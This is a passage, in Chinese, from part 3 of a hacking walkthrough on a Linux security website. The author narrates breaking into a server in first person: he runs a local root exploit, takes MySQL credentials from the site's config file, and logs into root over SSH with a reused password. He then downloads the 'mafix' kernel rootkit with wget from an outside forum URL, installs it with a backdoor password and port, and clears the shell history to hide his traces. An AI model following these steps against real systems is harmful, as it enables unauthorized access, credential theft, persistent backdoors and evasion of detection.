Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

特殊的php上传漏洞获取linux root 栽下rootkit(3)

来源: 未知 分享至:
现在OK了,继续。
./1 456
suid.c: In function \'main\':
suid.c:3: warning: incompatible implicit declaration of built-in function \'execl\'
./1: line 131: /tmp/udev: Permission denied
/tmp/udev没有执行权限,chmod +x 无用,看来现在我就要对exploit进行修改了,把/tmp/替换为一个拥有权限的目录,比如web目录(注意不要设置与程序同一个目录),再执行看回显:
./1 456
suid.c: In function \'main\':
suid.c:3: warning: incompatible implicit declaration of built-in function \'execl\'
执行上没有出问题,但似乎并没有成功,据baoz总等人讲,有时候需要反复溢出,但我大概溢出了NN>10)次也没见成功,看来是人品问题。此路不通换一路,我记得2002年还是2003年来着写过一篇渗透国内某linux服务器组的文章,大概意思是管理员的密码通用,所以下面工作就是采集信息了,现在找到网站的数据库连接配置文件。如图10:
 
 \"\"
看到 mysql的用户和密码,可惜不是root ,这个服务器有很多库,用户名是网站的名字,似乎有点虚拟主机的样子,不过还是连接到数据库,将管理员表中的几个密码都记下来,然后一个一个得在ssh上登陆,试了大概10来个密码也没进去,最后用mysql的密码连上了root,貌似是我的大脑短路了,应该先试mysql的密码啊,这种逻辑错误的发生概率在我身上还是比较大的。之后我发现服务器上果然所有密码基本上都是同一个(ftp,ssh,网站等等)
 
有了root权限剩下的工作就是留个万恶的rootkit了。前几天opensc.ws上有人放了一个linux 2.6.* 内核的rootkit ,我在自己的服务器上和虚拟机上都测试了一下,还是不错的。我传到EST论坛了,大家可以试试。帖子地址:
 
root登陆sshwget下载 (这里下载就不用加https了,另外上面发的是帖子地址下面是附件地址,wget要连接附件的地址。)
[root@*** tmp]# wget http://forum.eviloctal.com/attachment.php?aid=13419
 
……省略                                                                                          446,713      275K/s   in 1.6s     /* 速度还挺快 */
10:38:45 (275 KB/s) - `mafix.tar.gz\' saved [446713]
在然后 tar zxvf mafix.tar.gz 解压缩。进入目录,赋予root文件执行权限,如图11
 
\"\"
格式为./root 连接密码端口  回车
由于这个服务器配置问题bash没有执行权限,我还了个目录执行,如果安装成功结果会如下图12
\"\"
 
安装成功后目录会自行删除,最后 history -c 清除我们的命令记录。
 

Tags: root 栽下 rootkit 获取 上传
分享至:
最新图文资讯
1 2 3 4 5 6
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
推荐内容
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史